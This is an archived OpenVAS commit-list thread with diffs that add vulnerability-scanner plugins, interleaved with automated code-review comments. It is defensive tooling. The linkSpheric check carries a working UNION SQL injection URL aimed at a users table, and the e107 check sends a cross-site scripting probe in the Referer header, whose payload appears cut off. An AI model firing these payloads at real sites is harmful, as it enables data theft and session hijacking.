From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 17:35:56 +0200 (CEST) Subject: [Openvas-commits] r5435 - in trunk/openvas-manager: . src Message-ID: <20091007153556.A6927861EAB4@pyrosoma.intevation.org> Author: mattm Date: 2009-10-07 17:35:56 +0200 (Wed, 07 Oct 2009) New Revision: 5435 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/tasks_sql.h Log: * src/tasks_sql.h (make_task_rcfile): Remove append of name. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2009-10-07 15:28:00 UTC (rev 5434) +++ trunk/openvas-manager/ChangeLog 2009-10-07 15:35:56 UTC (rev 5435) @@ -1,6 +1,10 @@ +2009-10-07 Matthew Mundell + + * src/tasks_sql.h (make_task_rcfile): Remove append of name. + 2009-10-06 Tim Brown - * src/otp.c: Fixed memoey leak. + * src/otp.c: Fixed memory leak. 2009-10-06 Matthew Mundell Modified: trunk/openvas-manager/src/tasks_sql.h =================================================================== --- trunk/openvas-manager/src/tasks_sql.h 2009-10-07 15:28:00 UTC (rev 5434) +++ trunk/openvas-manager/src/tasks_sql.h 2009-10-07 15:35:56 UTC (rev 5435) @@ -1612,8 +1612,6 @@ preference_iterator_value (&prefs)); cleanup_iterator (&prefs); - g_string_append_printf (buffer, "name = %s\n", name); - /* Targets for general preferences. */ hosts = target_hosts (target); From scm-commit at wald.intevation.org Thu Oct 8 08:22:35 2009 
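Review bot: The log for src/tasks_sql.h says only "Remove append of name" and gives no reason for dropping g_string_append_printf (buffer, "name = %s\n", name) from make_task_rcfile. Client r5434 adds the name line itself when it is missing, so state in the ChangeLog that the two changes belong together, and check that name is still needed in make_task_rcfile after this removal. The ChangeLog hunk also corrects "memoey" in the 2009-10-06 entry for src/otp.c, an unrelated edit that the log message does not mention.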
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 8 Oct 2009 08:22:35 +0200 (CEST) Subject: [Openvas-commits] r5436 - in trunk/openvas-plugins: . scripts Message-ID: <20091008062235.5E7E5861EACA@pyrosoma.intevation.org> Author: chandra Date: 2009-10-08 08:22:29 +0200 (Thu, 08 Oct 2009) New Revision: 5436 Added: trunk/openvas-plugins/scripts/gb_avast_av_detect_win.nasl trunk/openvas-plugins/scripts/gb_avast_av_mult_vuln_oct09_win.nasl trunk/openvas-plugins/scripts/gb_backuppc_clientnamealias_sec_bypass_vuln.nasl trunk/openvas-plugins/scripts/gb_backuppc_detect.nasl trunk/openvas-plugins/scripts/gb_e107_referer_xss_vuln.nasl trunk/openvas-plugins/scripts/gb_linkspheric_detect.nasl trunk/openvas-plugins/scripts/gb_linkspheric_viewlisting_sql_inj_vuln.nasl trunk/openvas-plugins/scripts/gb_phpgenealogie_detect.nasl trunk/openvas-plugins/scripts/gb_phpgenealogie_rfi_vuln.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-07 15:35:56 UTC (rev 5435) +++ trunk/openvas-plugins/ChangeLog 2009-10-08 06:22:29 UTC (rev 5436) 
@@ -1,3 +1,16 @@ +2009-10-08 Chandrashekhar B + + * scripts/gb_phpgenealogie_detect.nasl, + scripts/gb_backuppc_clientnamealias_sec_bypass_vuln.nasl, + scripts/gb_phpgenealogie_rfi_vuln.nasl, + scripts/gb_linkspheric_detect.nasl, + scripts/gb_avast_av_mult_vuln_oct09_win.nasl, + scripts/gb_linkspheric_viewlisting_sql_inj_vuln.nasl, + scripts/gb_avast_av_detect_win.nasl, + scripts/gb_backuppc_detect.nasl, + scripts/gb_e107_referer_xss_vuln.nasl: + Added new plugins. + 2009-10-07 Jan-Oliver Wagner * scripts/webmirror.nasl: Added more information about Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2009-10-07 15:35:56 UTC (rev 5435) +++ trunk/openvas-plugins/cve_current.txt 2009-10-08 06:22:29 UTC (rev 5436) @@ -73,14 +73,14 @@ CVE-2009-3328 SecPod CVE-2009-3327 SecPod CVE-2009-3330 SecPod svn R -CVE-2009-3369 SecPod +CVE-2009-3369 SecPod svn L CVE-2009-2817 SecPod svn L CVE-2009-3366 SecPod svn R CVE-2009-3367 Secpod svn R CVE-2009-3364 SecPod svn L CVE-2009-3340 SecPod svn L CVE-2009-3431 SecPod svn L -CVE-2009-3444 SecPod +CVE-2009-3444 SecPod svn R CVE-2009-3455 SecPod CVE-2009-3454 SecPod svn L CVE-2009-3456 SecPod svn L 
@@ -102,14 +102,20 @@ CVE-2009-3125 Greenbone svn R 36390 Greenbone svn R CVE-2009-3165 Greenbone svn R -CVE-2009-3523 SecPod -CVE-2009-3522 SecPod -CVE-2009-3524 SecPod +CVE-2009-3523 SecPod svn L +CVE-2009-3522 SecPod svn L +CVE-2009-3524 SecPod svn L CVE-2009-3518 SecPod CVE-2009-3510 SecPod -CVE-2009-3541 SecPod +CVE-2009-3541 SecPod svn R CVE-2009-3484 SecPod 36543 Greenbone svn R 36391 Greenbone svn R -CVE-2009-3545 SecPod - +CVE-2009-3545 SecPod +CVE-2009-3571 SecPod +CVE-2009-3570 SecPod +CVE-2009-3569 SecPod +CVE-2009-3544 SecPod +CVE-2009-3562 SecPod +CVE-2009-3561 SecPod +CVE-2009-3525 SecPod Added: trunk/openvas-plugins/scripts/gb_avast_av_detect_win.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_avast_av_detect_win.nasl 2009-10-07 15:35:56 UTC (rev 5435) +++ trunk/openvas-plugins/scripts/gb_avast_av_detect_win.nasl 2009-10-08 06:22:29 UTC (rev 5436) 
@@ -0,0 +1,78 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_avast_av_detect_win.nasl 5171 2009-10-06 16:57:29Z oct $ +# +# avast! AntiVirus Version Detection (Win) +# +# Authors: +# Sharath S +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801110); + script_version("$Revision: 1.0 $"); + script_name("avast! AntiVirus Version Detection (Win)"); + desc = " + Overview: This script detects the installed version of avast! AntiVirus + and sets the result in KB. + + Risk Factor: Informational"; + + script_description(desc); + script_summary("Set KB for the version of avast! 
AntiVirus"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("Service detection"); + script_dependencies("secpod_reg_enum.nasl"); + script_require_keys("SMB/WindowsVersion"); + script_require_ports(139, 445); + exit(0); +} + + +include("smb_nt.inc"); +include("secpod_smb_func.inc"); + +if(!get_kb_item("SMB/WindowsVersion")){ + exit(0); +} + +path1 = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"; + +foreach path (make_list("avast!", "avast5")) +{ + avastName = registry_get_sz(key:path1 + path, item:"DisplayName"); + + if(avastName =~ "avast! (Free )?Antivirus") + { + avastVer = registry_get_sz(key:path1 + path, item:"DisplayVersion"); + + if(!(avastVer =~ "^([0-9]\.[0-9]+\.[0-9]+\.[0-9]+)")) + { + avastPath = registry_get_sz(key:path1 + path, item:"DisplayIcon"); + share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:avastPath); + file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:avastPath); + avastVer = GetVer(file:file, share:share); + } + if(!isnull(avastVer)){ + set_kb_item(name:"Avast!/AV/Win/Ver", value:avastVer); + } + } +} Property changes on: trunk/openvas-plugins/scripts/gb_avast_av_detect_win.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_avast_av_mult_vuln_oct09_win.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_avast_av_mult_vuln_oct09_win.nasl 2009-10-07 15:35:56 UTC (rev 5435) +++ trunk/openvas-plugins/scripts/gb_avast_av_mult_vuln_oct09_win.nasl 2009-10-08 06:22:29 UTC (rev 5436) 
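Review bot: In gb_avast_av_detect_win.nasl, the fallback branch uses avastPath from DisplayIcon without checking it: if that value is missing, both ereg_replace calls and GetVer(file:file, share:share) run on an empty value. Test avastPath before deriving share and file, and check the GetVer result against the same version pattern before set_kb_item, because isnull() alone lets an empty or non-version string into "Avast!/AV/Win/Ver", which the dependent vulnerability check then compares as a version. The pattern "^([0-9]\.[0-9]+\.[0-9]+\.[0-9]+)" also accepts only a single-digit major version, so any two-digit major would always take the file-version fallback.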
@@ -0,0 +1,90 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_avast_av_mult_vuln_oct09_win.nasl 5171 2009-10-06 16:31:26Z oct $ +# +# avast! Multiple Vulnerabilities - Oct09 (Win) +# +# Authors: +# Sharath S +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801111); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3522", "CVE-2009-3523", "CVE-2009-3524"); + script_bugtraq_id(36507); + script_name("avast! Multiple Vulnerabilities - Oct09 (Win)"); + desc = " + Overview: This host is installed with avast! AntiVirus and is prone to multiple + vulnerabilities. + + Vulnerability Insight: + - A boundary error exists in the 'aswMon2' kernel driver when processing + IOCTLs. This can be exploited to cause a stack-based buffer overflow + via a specially crafted 0xB2C80018 IOCTL. + - An error in the 'AavmKer4.sys' kernel driver that can be exploited to + corrupt memory via a specially crafted 0xB2D6000C or 0xB2D60034 IOCTL. + - An unspecified error exists in the ashWsFtr.dll library which can be + exploited to cause unknow impact. 
+ + Impact: + Successful exploitation will let the local attackers to cause a Denial of + Service or gain escalated privileges on the victim's system. + + Impact Level: System/Application + + Affected Software/OS: + avast! Home and Professional version prior to 4.8.1356 on Windows + + Fix: Upgrade to avast! version 4.8.1356 or later + http://www.avast.com/eng/download.html + + References: + http://secunia.com/advisories/36858/ + http://www.securityfocus.com/archive/1/506681 + http://www.vupen.com/english/advisories/2009/2761 + + CVSS Score: + CVSS Base Score : 7.2 (AV:L/AC:L/Au:NR/C:C/I:C/A:C) + CVSS Temporal Score : 5.6 + Risk factor: High"; + + script_description(desc); + script_summary("Check the version of avas ! Antivirus"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("Buffer overflow"); + script_dependencies("gb_avast_av_detect_win.nasl"); + script_require_keys("Avast!/AV/Win/Ver"); + exit(0); +} + + +include("version_func.inc"); + +avastVer = get_kb_item("Avast!/AV/Win/Ver"); +if(isnull(avastVer)){ + exit(0); +} + +# Check for avast! versions prior to 4.8.1356 +if(version_is_less(version:avastVer, test_version:"4.8.1356")){ + security_hole(0); +} Property changes on: trunk/openvas-plugins/scripts/gb_avast_av_mult_vuln_oct09_win.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_backuppc_clientnamealias_sec_bypass_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_backuppc_clientnamealias_sec_bypass_vuln.nasl 2009-10-07 15:35:56 UTC (rev 5435) +++ trunk/openvas-plugins/scripts/gb_backuppc_clientnamealias_sec_bypass_vuln.nasl 2009-10-08 06:22:29 UTC (rev 5436) 
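Review bot: In gb_avast_av_mult_vuln_oct09_win.nasl, two strings that end up in scan reports contain typos: script_summary reads "Check the version of avas ! Antivirus" and the insight text says "unknow impact". Change them to "avast!" and "unknown". The check is version-only against "Avast!/AV/Win/Ver", so it is only as reliable as the value the detect script stores; a comment saying so next to version_is_less would help whoever maintains the pair.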
@@ -0,0 +1,97 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_backuppc_clientnamealias_sec_bypass_vuln.nasl 5063 2009-10-06 17:52:24Z oct $ +# +# BackupPC 'ClientNameAlias' Function Security Bypass Vulnerability +# +# Authors: +# Sharath S +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801107); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3369"); + script_name("BackupPC 'ClientNameAlias' Function Security Bypass Vulnerability"); + desc = " + Overview: This host has BackupPC intallation and is prone to security bypass + vulnerability. + + Vulnerability Insight: + The security issue is caused due to the application allowing users to set the + 'ClientNameAlias' option for configured hosts. This can be exploited to backup + arbitrary directories from client systems for which Rsync over SSH is + configured as a transfer method. + + Impact: + Successful attacks may allow remote authenticated users to read and write + sensitive files by modifying ClientNameAlias to match another system, then + initiating a backup or restore on the victim's system. 
+ + Impact Level: System + + Affected Software/OS: + BackupPC version 3.1.0 and prior. + + Fix: + No solution or patch is available as on 06th October, 2009. Information + regarding this issue will be updated once the solution details are available. + For updates refer, http://backuppc.sourceforge.net/ + or + For Debian platform Update to version 3.1.0-7 from below link, + https://launchpad.net/debian/+source/backuppc/3.1.0-7 + http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=542218 + + ***** + NOTE: Ignore this warning if above mentioned patch is already applied. + ***** + + References: + http://osvdb.org/57236 + http://secunia.com/advisories/36393 + http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=542218 + + CVSS Score: + CVSS Base Score : 8.5 (AV:N/AC:M/Au:SI/C:C/I:C/A:C) + CVSS Temporal Score : 6.3 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version of BackupPC"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("General"); + script_dependencies("gb_backuppc_detect.nasl"); + script_require_keys("BackupPC/Ver"); + exit(0); +} + + +include("version_func.inc"); + +backuppcVer = get_kb_item("BackupPC/Ver"); +if(backuppcVer) +{ + # Check for BackupPC version <= 3.1.0 + if(version_in_range(version:backuppcVer, test_version:"3.0", + test_version2:"3.1.0")){ + security_hole(0); + } +} Property changes on: trunk/openvas-plugins/scripts/gb_backuppc_clientnamealias_sec_bypass_vuln.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_backuppc_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_backuppc_detect.nasl 2009-10-07 15:35:56 UTC (rev 5435) +++ trunk/openvas-plugins/scripts/gb_backuppc_detect.nasl 2009-10-08 06:22:29 UTC (rev 5436) 
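Review bot: In gb_backuppc_clientnamealias_sec_bypass_vuln.nasl, the description says "version 3.1.0 and prior" and the code comment says "<= 3.1.0", but version_in_range(test_version:"3.0", test_version2:"3.1.0") skips every release below 3.0. Use version_is_less_equal with "3.1.0", or state the lower bound in the description if it is intended. The check also cannot tell the patched Debian package 3.1.0-7 from upstream 3.1.0 and leaves that to the NOTE in the description, so a host that is already fixed is still reported with security_hole. "intallation" in the overview should read "installation".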
@@ -0,0 +1,65 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_backuppc_detect.nasl 5063 2009-10-06 16:05:29Z oct $ +# +# BackupPC Version Detection +# +# Authors: +# Sharath S +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801106); + script_version("$Revision: 1.0 $"); + script_name("BackupPC Version Detection"); + desc = " + Overview: This script detects the installed version of BackupPC and + sets the reuslt in KB. 
+ + Risk Factor: Informational"; + + script_description(desc); + script_summary("Set KB for the version of BackupPC"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("Service detection"); + exit(0); +} + + +include("ssh_func.inc"); +include("version_func.inc"); + +backupSock = ssh_login_or_reuse_connection(); +if(!backupSock){ + exit(0); +} + +backupName = find_bin(prog_name:"BackupPC", sock:backupSock); +foreach binName (backupName) +{ + backupVer = get_bin_version(full_prog_name:"cat", version_argv:binName, + ver_pattern:"Version ([0-9]\.[0-9]\.[0-9]+"+ + "(beta[0-9])?)", sock:backupSock); + if(backupVer[1] != NULL){ + set_kb_item(name:"BackupPC/Ver", value:backupVer[1]); + } +} +ssh_close_connection(); Property changes on: trunk/openvas-plugins/scripts/gb_backuppc_detect.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_e107_referer_xss_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_e107_referer_xss_vuln.nasl 2009-10-07 15:35:56 UTC (rev 5435) +++ trunk/openvas-plugins/scripts/gb_e107_referer_xss_vuln.nasl 2009-10-08 06:22:29 UTC (rev 5436) 
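Review bot: In gb_backuppc_detect.nasl, the foreach over the find_bin result calls set_kb_item(name:"BackupPC/Ver", ...) for every binary that matches and never leaves the loop, so a host with more than one copy gets several values under the same key and the dependent check has no defined one to compare. Stop after the first match or record the path with the version. The pattern "Version ([0-9]\.[0-9]\.[0-9]+" allows only single-digit major and minor numbers, and the script declares no dependency or required key although it relies on ssh_login_or_reuse_connection(). "reuslt" in the overview should read "result".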
@@ -0,0 +1,102 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_e107_referer_xss_vuln.nasl 5050 2009-10-06 16:29:41Z oct $ +# +# e107 'Referer' Header Cross-Site Scripting Vulnerability +# +# Authors: +# Nikita MR +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(800946); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3444"); + script_name("e107 'Referer' Header Cross-Site Scripting Vulnerability"); + desc = " + Overview: This host is running e107 and is prone to remote Cross-Site + Scripting vulnerability. + + Vulnerability Insight: + The flaw exists due to error in 'email.php' in 'news.1' action. It does not + properly filter HTML code from user-supplied input in the HTTP 'Referer' + header before displaying the input. + + Impact: + Attackers can exploit this issue to execute arbitrary HTML and script code + in a user's browser session in the context of an affected site. + + Impact Level: Application + + Affected Software/OS: + e107 version 0.7.16 and prior. + + Fix: + No solution/patch is available as on 06th , October 2009. 
Information + regarding this issue will updated once the solution details are available. + For updates refer, http://e107.org/edownload.php + + References: + http://websecurity.com.ua/3528/ + http://www.vulnaware.com/?p=17929 + http://secunia.com/advisories/36832/ + + CVSS Score: + CVSS Base Score : 4.3 (AV:N/AC:M/Au:NR/C:N/I:P/A:N) + CVSS Temporal Score : 3.9 + Risk factor: Medium"; + + script_description(desc); + script_summary("Validate through the attack string"); + script_category(ACT_MIXED_ATTACK); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("Web application abuses"); + script_dependencies("http_version.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); + +ePort = get_http_port(default:80); +if(!ePort){ + exit(0); +} + +if(safe_checks()){ + exit(0); +} + +foreach dir (make_list("/", "/e107", "/cms", cgi_dirs())) +{ + sndReq = string('GET ' + dir + '/email.php?news.1 HTTP/1.1\r\n', + 'Host: ', get_host_name(),'\r\n', + 'Referer: >\r\n', + '\r\n'); + + rcvRes = http_send_recv(port:ePort, data:sndReq); + if(egrep(pattern:"^HTTP/.* 200 OK", string:rcvRes) && + "alert(document.cookie)" >< rcvRes) + { + security_warning(ePort); + exit(0); + } +} Property changes on: trunk/openvas-plugins/scripts/gb_e107_referer_xss_vuln.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_linkspheric_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_linkspheric_detect.nasl 2009-10-07 15:35:56 UTC (rev 5435) +++ trunk/openvas-plugins/scripts/gb_linkspheric_detect.nasl 2009-10-08 06:22:29 UTC (rev 5436) 
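Review bot: In gb_e107_referer_xss_vuln.nasl, the success test only looks for "alert(document.cookie)" in a 200 response, so a page that echoes the Referer with its angle brackets HTML-encoded still matches and is reported through security_warning. Match on the complete injected markup exactly as it was sent. The script is ACT_MIXED_ATTACK but exits when safe_checks() is set, so it does nothing in safe mode; add a version-based path or change the category. For the "/" entry of make_list, dir + '/email.php' builds "//email.php", and the pattern "^HTTP/.* 200 OK" depends on the reason phrase rather than the status code alone.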
@@ -0,0 +1,86 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_linkspheric_detect.nasl 5169 2009-10-08 10:10:24Z oct $ +# +# linkSpheric Version Detection +# +# Authors: +# Sharath S +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801112); + script_version("$Revision: 1.0 $"); + script_name("linkSpheric Version Detection"); + desc = " + Overview: This script detects the installed version of linkSpheric and + sets the result in KB. 
+ + Risk factor: Informational"; + + script_description(desc); + script_summary("Set version of linkSpheric in KB"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("Service detection"); + script_dependencies("http_version.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); + +spheric_port = get_http_port(default:80); +if(!spheric_port){ + spheric_port = 80; +} + +if(!get_port_state(spheric_port)){ + exit(0); +} + +foreach dir (make_list("/linkSpheric", "/Spheric", "/", cgi_dirs())) +{ + sndReq = http_get(item:dir + "/admin/index.php", port:spheric_port); + rcvRes = http_send_recv(port:spheric_port, data:sndReq); + + if("linkSpheric" >< rcvRes ) + { + version = eregmatch(pattern:"linkSpheric version ([0-9.]+( Beta [0-9.])?)", + string:rcvRes, icase:1); + if(isnull(version)) + { + sndReq = http_get(item:dir + "/CHANGELOG", port:spheric_port); + rcvRes = http_send_recv(port:spheric_port, data:sndReq); + version = egrep(pattern:"version [0-9.]+[a-z0-9 ]+(release)", + string:rcvRes, icase:1); + version = eregmatch(pattern:"version ([0-9.]+( Beta [0-9])?)", + string:version, icase:1); + } + spheric_ver[1] = ereg_replace(pattern:" ", replace:".", string:version[1]); + + if(!isnull(spheric_ver[1])) + { + set_kb_item(name:"www/" + spheric_port + "/linkSpheric", + value:spheric_ver[1] + " under " + dir); + } + } +} Property changes on: trunk/openvas-plugins/scripts/gb_linkspheric_detect.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_linkspheric_viewlisting_sql_inj_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_linkspheric_viewlisting_sql_inj_vuln.nasl 2009-10-07 15:35:56 UTC (rev 5435) +++ trunk/openvas-plugins/scripts/gb_linkspheric_viewlisting_sql_inj_vuln.nasl 2009-10-08 06:22:29 UTC (rev 5436) 
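Review bot: In gb_linkspheric_detect.nasl, version can still be NULL after the CHANGELOG fallback, yet spheric_ver[1] = ereg_replace(..., string:version[1]) runs unconditionally and the later isnull(spheric_ver[1]) test depends on what ereg_replace returns for an empty input. Check version before the replace and skip the directory when nothing matched. The "/" entry in make_list produces "//admin/index.php" and a KB value ending in "under /", which the dependent SQL injection script then extends to "//viewListing.php"; normalise the directory before building the URL and before storing it. The two version patterns also disagree on the Beta suffix, "[0-9.]" in the first and "[0-9]" in the second.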
@@ -0,0 +1,112 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_linkspheric_viewlisting_sql_inj_vuln.nasl 5169 2009-10-08 11:43:17Z oct $ +# +# linkSpheric 'viewListing.php' SQL Injection Vulnerability +# +# Authors: +# Sharath S +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801113); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3510"); + script_name("linkSpheric 'viewListing.php' SQL Injection Vulnerability"); + desc = " + Overview: The host is running linkSpheric and is prone to SQL Injection + vulnerability. + + Vulnerability Insight: + The flaw is due to error in viewListing.php which can be exploited to cause + SQL injection via the 'listID' parameter. + + Impact: + Successful exploitation could allow execution of arbitrary SQL commands in + the affected application. + + Impact Level: Application + + Affected Software/OS: + linkSpheric version 0.74 Beta 6 and prior. + + Fix: No solution or patch is available as on 08th October, 2009. Information + regarding this issue will be updated once the solution details are available. 
+ For updates refer, http://dataspheric.com/ + + References: + http://www.milw0rm.com/exploits/9316 + https://launchpad.net/bugs/cve/2009-3510 + + CVSS Score: + CVSS Base Score : 7.5 (AV:N/AC:L/Au:NR/C:P/I:P/A:P) + CVSS Temporal Score : 6.7 + Risk factor: High"; + + script_description(desc); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_summary("Check through the attack string and version of linkSpheric"); + script_category(ACT_MIXED_ATTACK); + script_family("Web application abuses"); + script_dependencies("gb_linkspheric_detect.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +spheric_port = get_http_port(default:80); +if(!spheric_port){ + exit(0); +} + +spheric_ver = get_kb_item("www/" + spheric_port + "/linkSpheric"); +if(isnull(spheric_ver)){ + exit(0); +} + +spheric_ver = eregmatch(pattern:"^(.+) under (/.*)$", string:spheric_ver); +if(!isnull(spheric_ver[2]) && !safe_checks()) +{ + url = string(spheric_ver[2], "/viewListing.php?listID=-5+union+select+1,2," + + "3,4,5,6,7,8,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54" + + "657374,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27" + + ",28+from+users--"); + + sndReq = http_get(item:url, port:spheric_port); + rcvRes = http_send_recv(port:spheric_port, data:sndReq); + + if(egrep(pattern: "OpenVAS-SQL-Injection-Test", string:rcvRes)) + { + security_hole(spheric_port); + exit(0); + } +} +else +{ + if(spheric_ver[1] != NULL) + { + if(version_is_less_equal(version:spheric_ver[1], test_version:"0.74.Beta.6")){ + security_hole(spheric_port); + } + } +} Property changes on: trunk/openvas-plugins/scripts/gb_linkspheric_viewlisting_sql_inj_vuln.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_phpgenealogie_detect.nasl =================================================================== --- 
trunk/openvas-plugins/scripts/gb_phpgenealogie_detect.nasl 2009-10-07 15:35:56 UTC (rev 5435) +++ trunk/openvas-plugins/scripts/gb_phpgenealogie_detect.nasl 2009-10-08 06:22:29 UTC (rev 5436) 
